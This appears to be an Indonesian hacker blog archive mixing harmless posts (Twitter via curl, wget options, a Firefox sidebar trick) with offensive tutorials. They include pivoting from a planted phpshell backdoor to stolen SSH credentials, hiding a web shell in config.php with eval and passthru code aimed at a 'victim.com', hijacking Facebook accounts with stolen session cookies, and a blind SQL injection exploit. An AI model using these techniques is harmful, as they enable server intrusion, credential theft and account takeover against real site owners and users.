thund3r-x2 coret coret

Cara Baru update twitter via Terminal Linux

noreply@blogger.com (thund3r_x2) — Mon, 01 Aug 2011 19:28:00 +0000

Pernah setahun lalu ada tutorial yang mengupdate twitter menggunakan curl. Kurang lebih caranya seperti ini..


$ curl -u username:password -d status="bla bla bla bla" http://twitter.com/statuses/update.xml

Right??? yup tapi ternyata waktu saya coba cara itu sudah tidak bisa digunakan lagi. Akhirnya saya coba untuk mengakali dengan cara baru..

Ide ini datang saat salah satu aktris Indonesia Marshanda yang pada twitternya mengumumkan, mengadakan lomba tercepat men-tweet tentang launchingnya official site barunya. mulai dari jam 00:00. Nah dari lomba itu saya terfikir untuk membuat schedule agar machine saya bisa tweet about it at the right time. Tapi failed.. kenapa? ngga keburu.. saya tau lomba jam 9 malam.. sedang saya harus ngakalin tweet juga..

Ok stop Curhat, coba ke materi.

Twitter sekarang sudah mempunyai site versi mobile. Nah twitter versi mobile itu yang akan kita gunakan.

pertama kita harus mengambil cookie dari hasil login kita. dengan cara


$ curl -b kue -c kue --data 'username=thund3r-x2' --data 'password=anypassword' https://mobile.twitter.com/session/

Dari situ nanti akan ada file baru bernama 'kue' yang berisi cookie kita yang baru.
file cookie ini akan kita gunakan untuk mengupdate status nantinya tapi ada satu variable lagi yang harus kita dapet.. nama variabel hidden yaitu authenticity_token. isi dari variable ini adalah kumpulan angka sebanyak 20 angka. Saya belum tahu bagaimana application mobile twitter mengenerate angka-angka ini. untuk mendapat kan token ini caranya


$ curl -b kue -c kue http://mobile.twitter.com | awk '/id=\"new_tweet/' | sed 's/[\"|<|\/>|div]//g' | cut -d"=" -f9

dari command itu akan dihasilkan token misal token yang didapat adalah 1e3a3b4c457781345123

sebelaum ke command selanjutnya saya akan jelaskan per pipe :=

- option -b/--cookie :: option ini menunjuk file yang berisi cookie yang akan POST ke server.

- option -c/--cookie-jar :: option ini akan mengambil cookie yang ada dan menuliskannya ke file yang kita pass di depan option ini.

- awk :: ini salah satu command linux untuk mengambil satu line yang di tandai oleh regex (regular expression) dimana pada command di atas saya mengambil satu line yang menggandung kata "id=new_tweet"

- sed :: command linux juga yang pada command diatas digunakan untuk mereplace. pada command diatas itu saya coba untuk mengghapus tanda kutip (") atau tanda tag (< || />) dan kata (div).

- cut :: cut ini adalah untuk membagi sebuah line ke dalam beberapa colomn berdasarkna dilimiter option yang kita masukan. Dimana saya disini menggunakan dilimiter "=" untuk memisahkan tiap kata/kalimat dan menggunakan option -f untuk mengambil column yang ke sekian untuk mendapatkan result yang kita inginkan.

Untuk lebih jelas command command linux tersebut bisa menggunakan Manual di linux sendiri.

Dari token yang kita dapat tersebut kita akan POST ke twitter diikuti dengan update status kita. seperti ini


$ curl -b kue -c kue --data 'authenticity_token=1e3a3b4c457781345123' --data 'tweet[text]=coba update via curl' http://mobile.twitter.com

setelah command di eksekusi. Curl akan mengirim dua variable itu ke twitter dan langsung mengupdate status, berdasarkan apa yang kita masukan ke variabel tweet[text]

silahkan check twitternya.
ini hanya proof of concept. masih bisa dikembangkan lebih lanjut lagi misal kita feed twitter dengan cara yang sama dan teknik lainnya.. tergantung kebutuhan..

Dosen yang suka ngaku - ngaku

noreply@blogger.com (thund3r_x2) — Sun, 18 Apr 2010 04:59:00 +0000

Lama tak pernah posting disini. Alasan simple dan dah umum. Soalnya sibuk.. hahah.. basi.. sekarang sesi curhat aja dulu.

Pernah ada temen yang kuliah disalah satu sekolah tinggi di yogyakarta yang tanya tentang satu hal. katanya seperti ini "Mas, tau caranya buat biar bisa ada 3 sistem operasi di dalam 1 flash disk? tapi tiga tiganya bisa jalan dalam satu waktu... aku ada tugas dari dosen anu tentang ini.." aku rada bingung tentang masalah ini. klo 3 system operasi dalam 1 flash disk it's Ok itu bisa. tapi kalau harus jalankan 3 sistem operasi secara bersamaan itu serasa ga mungkin. trus aku kasih saran seperti ini. "kalau misal kita pake 1 system operasi lalu 2 sistem operasi lainnya menggunakan virtual gimana?" dia jawab "nggak mas dia bilang katanya pas power komputer itu nyala 3 system operasi itu bisa jalan barengan". Kaget gw disitu.. serasa ngga mungkin. walau ngga ada yang ngga mungkin tapi untuk seorang yang baru belajar komputer, tugas itu bener bener berat. ibaratnya gini orang ngetik aja baru kemaren sekarang harus dah bisa bikin OS sendiri. beuuh jenius banget klo langsung bisa.

Nah suatu hari aku ada acara sama satu dosennya panggil aja Mr.X . akhirnya kita tanyakan tentang permasalahan itu. Ternyata eh ternyata. dosen yang kasih tugas ke mahasiswa tadi itu dapet soalnya dari Mr.X ini. tapi yang Mr.x kasih itu hanya bagaimana 3 system operasi bisa ada dalam satu flash disk. Ngga pake embel embel 3 system operasi jalan dalam satu waktu tanpa virtual. Nah base dari masalah memang dah ketemu tapi tetep jawaban soal masih bingung.

Jadi kesimpulannya si Dosen yang kasih tugas ini berfikir terlalu jauh. dan terlalu menambah - nambah. padahal dia juga mungkin blom bisa dan blom pernah. Yang aku tau. dosen satu ini "songong" tau artinya "songong"? blagu. alias sok tau tapi blom tau. kadang suka ngaku ngaku bikin ini bikin itu padahal nol besar. cuma pengen keliatan keren aja di depan mahasiswa.

Tapi sampe sekarang aku masih mikirin tuh maksud dosen apa. menjalankan 3 system operasi dalam satu waktu tanpa virtual. hmmm....

buat Dosen klo baca ini.. mikir dulu ya sebelum kasih tugas.. belajar itu perlu tahapan. lagian klo blom pernah dapet jawabanya jangan dilempar ke mahasiswa yang baru kenal dengan dunia komputer. klo blom bisa bilang blom bisa. jangan ngga bisa bilang bisa. kecuali klo mang bilang bisa trus langsung dicari hasilnya. ini boro boro. bilang bisa tapi ngga dicari pemecahannya cuma nunggu dari mahasiswa yang berhasil dapetin jawabannya. Mahasiswa akan terus cari informasi dari orang yang tepat. dan mungkin itu bakal jatuh reputasi anda sebagai dosen. hahha..

Dapetin ID Facebook dari foto yang di share

noreply@blogger.com (thund3r_x2) — Thu, 14 Jan 2010 04:21:00 +0000

postingan ini cuma buat main main aja..

jadi gini.. kadangan kan ada yang share photo dari facebook cuma kasih link gambar aslinya..

misal :

http://photos-h.ak.fbcdn.net/hphotos-ak-snc3/hs213.snc3/22074_1145958823930_1676337142_295520_440760_n.jpg

nah kita pengen tau facebook si pemilik foto siapa, ya klo bisa di add..
caranya gampang.. liat nama gambarkan

22074_1145958823930_1676337142_295520_440760_n.jpg

nah kumpulan angka di belakang underscore ke dua itu idnya pemilik..
di contoh idnya 1676337142
jadi kita masukin aja id dia..

http://facebook.com/profile.php?id=1676337142

and taraaa.. berhasil.. tinggal add aja pemiliknya..

yang masih jadi penelitian ku sendiri angka angka lainnya yang ada di foto.. hmm..
ya cuma iseng iseng... :D

Live Streaming On Sidebar Firefox

noreply@blogger.com (thund3r_x2) — Sun, 15 Nov 2009 07:13:00 +0000

Pernah live streming di sidebar??
hehe.. sebenernya idenya dari chat facebook di sidebar ya. cuma bedanya ini streaming. dan ide ini kepikiran pas aku lagi pengen nonton E-lifestyle tentang wimax sambil chat sama comment-comment di facebook. tapi ngga mau bolak balik buka tab browser. jadi gini...

ok aku ambil streaming dari live metro tv aja ya..

sekarang tinggal buka aja notepad trus copy paste code ini :
<object style="visibility: visible;" id="player" data="http://www.metrotvnews.com/us_player.swf" type="application/x-shockwave-flash" height="229" width="320"><param value="scale=noscale&wmode=transparent&arrowScale=20" name="flashvars"></object>

trus save pake extensi html. misal di save metro.html

nah buka firefox nya trus pilih Boorkmarks >> Organize Bookmarks. misal di boorkmark toolbar. klik kanan di bookmark toolbar trus pilih new boorkmark. nah di jendela yang ada akan di suruh ngisi name location dll.

di name terserah isi apa aja. misal name metroTV. trus location pilih folder lokasi file metro.html gimana cara liat nya.. buka aja file metro.html pake firefox trus yang ada di box address di copy semua. misal

file:///C:/Documents%20and%20Settings/systemadmin/Desktop/metro.html

yang keyword ma description ngga usah di isi. trus centang Load this in sidebar. trus add. nah tinggal klik aja metro di boorkmark.

ini cuma sebuah ide coy. setiap streaming codenya kan beda beda..

nah dari mana code tadi.. gampang kok.. buka aja live streaming metro tv. dah gitu block dari dari tulisan home sampe bawah layar tv itu. trus klik kanan pilih yang view selection source. nah ntar bakal keliatan code itu. klo kita ngga block dulu source (langsung view source code) tadi malah ngga muncul code itu. hoho..

klo dah kepepet ide bisa dateng dengan gampang kan.. :P ngga percaya?? tanya sama maling.. hahaha..

(klik lebih jelas)

Blind SQLi and Ximple Exploit

noreply@blogger.com (thund3r_x2) — Thu, 24 Sep 2009 10:48:00 +0000

Video ini tentang sedikit Blind SQL injection yang lalu di lanjutkan dengan pembuatan tool dengan bahasa perl untuk menblind automatic target. Ingat tujuan dari Video ini bukan bagaimana kita menembus target. tapi bagaimana cara kita mempelajari teknik serangan dan membuat xploitnya.

Exploit yang dibikin dalam Video ini sangat simple bin sederhana banget jadi untuk kemampuan yang lebih berarti harus ada pengembangan dari attacker sendiri untuk kebutuhannya.. dalam video ini kita hanya memasukan target bersama dengan variable vulnerable nya.. dan setelah itu xploit akan mencoba mengekstraknya satu persatu.

lebih jelasnya download disini

[Megaupload]
[Rapidshare]

tutorial di Video ini simple banget.. moga bisa di pake belajar.. dan di kembangkan.. soalnya tujuannya emang itu, buat belajar.. :D

*gambar diambil dari hek.me

SSH account and tunneling SSH

noreply@blogger.com (thund3r_x2) — Sat, 13 Jun 2009 21:20:00 +0000

Disini dimisalkan kalian dah punya phpshell backdoor di site yang kalian attack, mungkin bisa dari hasil sql injection, rfi injection, bruteforce login atau apa lah. banyak cara buat dapet akses admin dari sebuah site. nah dari shell yang dah kita tanem bisa ngasilin ssh account yang dilanjut dipake buat hidding IP.

ok langsung pertama buka shell kalian. dari shell itu buka file passwd yang ada di folder etc. liat user mana saja yang punya akses SSH misal :
klik gambar untuk lebih jelas..

dari situ user yang ternyata punya akses ssh adalah imcomming ok dari sini target user dah dapet.. sekarang masuk ke folder sitenya dia.. misal ada di /home2/imcomming/public_html/ lalu cari file yang sekiranya disana ada password yang akses ke database atau klo beruntung tertulis juga akses ke FTP. misal :
klik gambar untuk lebih jelas..

nah disana ada file yang namanya setting.php dan didalam situ ada password dan usernamenya. kalau di wordpress mungkin namanya wp-login.php di joomla configuration.php atau banyak cms lain yang pastinya file filenya mirip kayak gitu lah. klo ngga ada ya berarti harus bedah script login. biasanya di login itu ada include yang mengakses file password database. OK password dah dapet. kita tinggal coba login ke SSH, klo di windows pake putty. u can download here.

buka putty lalu isi seperti kolom berikut.

nanti akan ada tampilan terminal bahwa kita sudah terkoneksi dan suruh kita masukan username yang di lanjut ngisi password. masukan usernamenya yang imcomming tadi lalu masukan password yang ada di file setting.php tadi. klo misal beruntung bakal langsung masuk..

kalau di linux biasanya dah ada bawaannya kita tinggal buka terminal trus ketik : ssh username@servernya selanjutnya sama kayak di putty

moga bisa ngerti maksudnya.. ^___^

ok lanjut untuk tunneling yang nantinya dipake browsing.. buka putty (windows) dan ikuti langkah dibawah ini

setelah itu tinggal open. dan login lah..
klo di linux lebih simple cukup dengan perintah # ssh -D "port" username@server "enter"

nb : port dinamic yang di masukan terserah.

setelah login ke sshnya kita buka firefox (browser fav gw) atau bisa buka browser fav kalian. setelah itu buka settingan proxy klo di mozilla (windows) :: tools > option > advance > network > setting, masukin setinggan kayak gini

klo di mozilla (linux) :: edit > preference > advance > network > setting.
setelah itu bukalah site untuk check IP. maka akan keliatan klo IP kita jadi IP server yang telah kita connectioning pake ssh.
yang biasa aku pake untuk check IP site >> www.ip-adress.com

by : thund3r-x2

[www.thund3r-x2.co.cc]

Hidden Shell and inject shell

noreply@blogger.com (thund3r_x2) — Fri, 22 May 2009 02:33:00 +0000

Pernah denger kan kata itu. gw denger kata itu dari phpshell yang dibuat oleh Gblack. Private shell ver. 1.3. mungkin pernah ada yang coba. phpshell ini dibuat untuk hidden shell di file php yang memang sudah ada di server dan bisa ditulisi atau dengan permision 777. kalau memang blom pernah coba.. download disini aja coba [download].

mungkin ada yang penasaran.. kenapa setiap file yang di tambahin variable cmd= di url itu keluar shell??

misal : hxxp://site.com/index.php?cmd=hacked

nah dengan pemanggilan seperti itu bisa keluar shell yang tersembunyi.
bagi seorang programer PHP hal ini ngga akan sulit tapi untuk seorang yang bener bener awam dengan php. bahkan mungkin setiap kali menggunakan phpshell tidak pernah liat sebenernya apa sih isi source nya itu bisa sampe ngexekusi system. Biasanya para pengguna seperti ini disebut sebagai script kiddies. yang hanya mengunakan tool tanpa mengerti bagaimana tools itu berkerja. ok masuk ke rahasia nya. jadi rahasianya ada di awal script itu. yaitu

if(!empty($_GET['cmd']){

>>> shell <<<
}

nah dari tambahan script itu. jika kita suntikan di file php. setiap kali ada tambahan variable cmd di url dan variablenya ngga kosong. maka itu shell akan muncul. kalian bisa mencoba nya di localhost.

tapi,, tetep ada tapinya. dengan kita menambah phpshell di file php otomatis size file php tersebut akan membengkak. agar tidak membengkak. maka kita gunakan fungsin yang sudah di sediakan oleh phpnya sendiri. yaitu fungsi file_get_contents(). dengan cara ini kita bisa mengambil isi file dari mana saja. misal..

kita punya shell yang kita simpan di folder tmp dengan file shell.txt nah kita ingin memanggilnya maka untuk kita inject di file php yang ada di public_html. Caranya tinggal kita panggil dengan fungsi file_get_contents() dan bantuan fungsi eval() (untuk lebih jelasnya fungsi ini bisa liat di php manual). contoh :

--- file config.php ---

<?php
$password = 'root';
$username = 'root';
eval(file_get_contents('/tmp/shell.txt'));
?>

--- end file config.php ---

nah dengan isi shell.txt seperti ini misal.

--- file shell.txt ---

<?php
echo "<form method='POST'>";
echo "<input type='txt' name='thund3rcmd'>";
echo "</form>";
$cmd = passthru($_GET['thund3rcmd']);
if(!empty($cmd)) {
?>
<pre>$cmd</pre>
<?php }} ?>

--- end shell.txt ---

itu misalnya saja.. nah itu di simpen di folder tmp. jadi kita manggilnya kayak gini

hxxp://victim.com/config.php?cwd=hackedbythund3r-x2

dan mudah mudahan.. klo shell ga error.. pasti bisa di exekusi.

dengan cara menggunakan fungsi file_get_contents() tadi. maka size file yang di inject ga akan terlalu membengkak..

sebenernya banyak cara lain.. ya tergantung creativitas yang pake aja deh.. seep..
be creative..

Segitu aja dulu.. :D
seep

kekurangan harap di maklum. tapi klo kelebihan hmm.. balikin aja ya.. :D

thanks for phpshellnya Gblack a.k.a biadabz

FBController for stealing Facebook Priv

noreply@blogger.com (thund3r_x2) — Sat, 09 May 2009 16:47:00 +0000

Pernah denger tool yang namanya FBController?? pasti ada yang udah ada yang belum kan..
hee.. tool ini bukan tool buat hacking account facebook tapi sekali loe dapetin victim pake ni tool loe bisa control semua fasilitas di facebook. tool ini di buat oleh "Azim Poonawala" bisa diliat di blognya disini.

Kita bisa mengontrol facebook victim dengan cookie yang sudah kita ambil dari accountnya saat login.. cookie bisa didapat dengan cara menggunakan teknik sniffing, xss, social enginerering, ARP Poison Sniffing, atau searching di search engine - search engine yang ada.

beberapa variable cookie yang di perlukan adalah

datr
ABT
s_vsn_facebookpoc_1
login_x
xs
c_user
h_user

untuk information lebih lagi bisa liat disini

download FBController.rar

wget help

noreply@blogger.com (thund3r_x2) — Fri, 08 May 2009 07:29:00 +0000

wget adalah salah satu tool bagus buat download.. kenapa soalnya fungsi wget banyak banget.. ngga cuma download biasa.. aku jelasin beberap fungsi wget.. sebenernya dah ada bantuan gimana caranya download pake wget.. tinggal ketik aja wget -h trus enter.. ntar keluar banyak option buat ningkatin kemampuan wget download..

yang pertama option yang sering di pake itu -c dan -b..

option -c ini dipake buat continue.. maksudnya kalau koneksinya jelek trus putus - putus. nah saat itu pasti download juga putus.. pake option ini kita bisa continue download sebelumny dari bagian file yang terkhir sebelumnya..

contoh : wget -c http://sitescampage.com/file/downloads/asik.exe

option -b ini dipake buat background.. maksudnya kita bisa tinggalin download jika kita menggunakan akses remote dan kita ingin mematikan akses remotenya..

contoh : wget -b http://sitescampage.com/file/downloads/asik.exe

option -r ini dipake buat download suatu web secara langsung. jadi kita bisa di bilang punya back up site orang lain di komputer kita sendiri.

contoh : wget -r http://sitescampage.com/file/downloads/asik.exe

option --tries=n ini dipake untuk mengulang download hingga n kali. di gunakan karena ada masalah dengan koneksi mungkin karena lelet.. atau mungkin bisa jadi kita tidak ingin download ulang terlalu sering.

contoh : wget --tries=5 http://sitescampage.com/file/downloads/asik.exe

option -N di gunakan untuk mendownload file terbaru dari yang ada di local.. bisa diistilahkan update file lama dengan yang baru..

contoh : wget -N http://sitescampage.com/file/downloads/asik.exe

option --limit-rate=nK di gunakan untuk mendownload tapi dengan kecepetan yang kita tentukan dengan mengganti nilai n di belakang sama dengan. K (kilobyte)

contoh : wget -bc --limit-rate=10k http://sitescampage.com/file/downloads/asik.exe

option --http-user=USERNAME --http-password=PASSWORD ini digunakan untuk mendownload file dari web yang menggunakan password.

option --ftp-user=USERNAME --ftp-password=PASSWORD sama dengan option http. bedanya ini digunakan untuk download via ftp

option --proxy-user=USERNAME --proxy-password=PASSWORD ini digunakan untuk mendownload file melalui proxy

option --no-check-certificate ini digunakan untuk mendowload tanpa menggunakan check certificate bila melalu protokol https

option -m ini digunakan untuk membuat miror dari sebuah ftp

masih banyak lagi option - option lain yang mungkin nantinya di butuhkan..
untuk menggunakan option :

example
wget -brc http://sitescampage.com
atau bisa juga seperti ini
wget -b -r -c http://sitescampage.com

reference:
google.com
fossil.amikom.ac.id
www.antiteori.com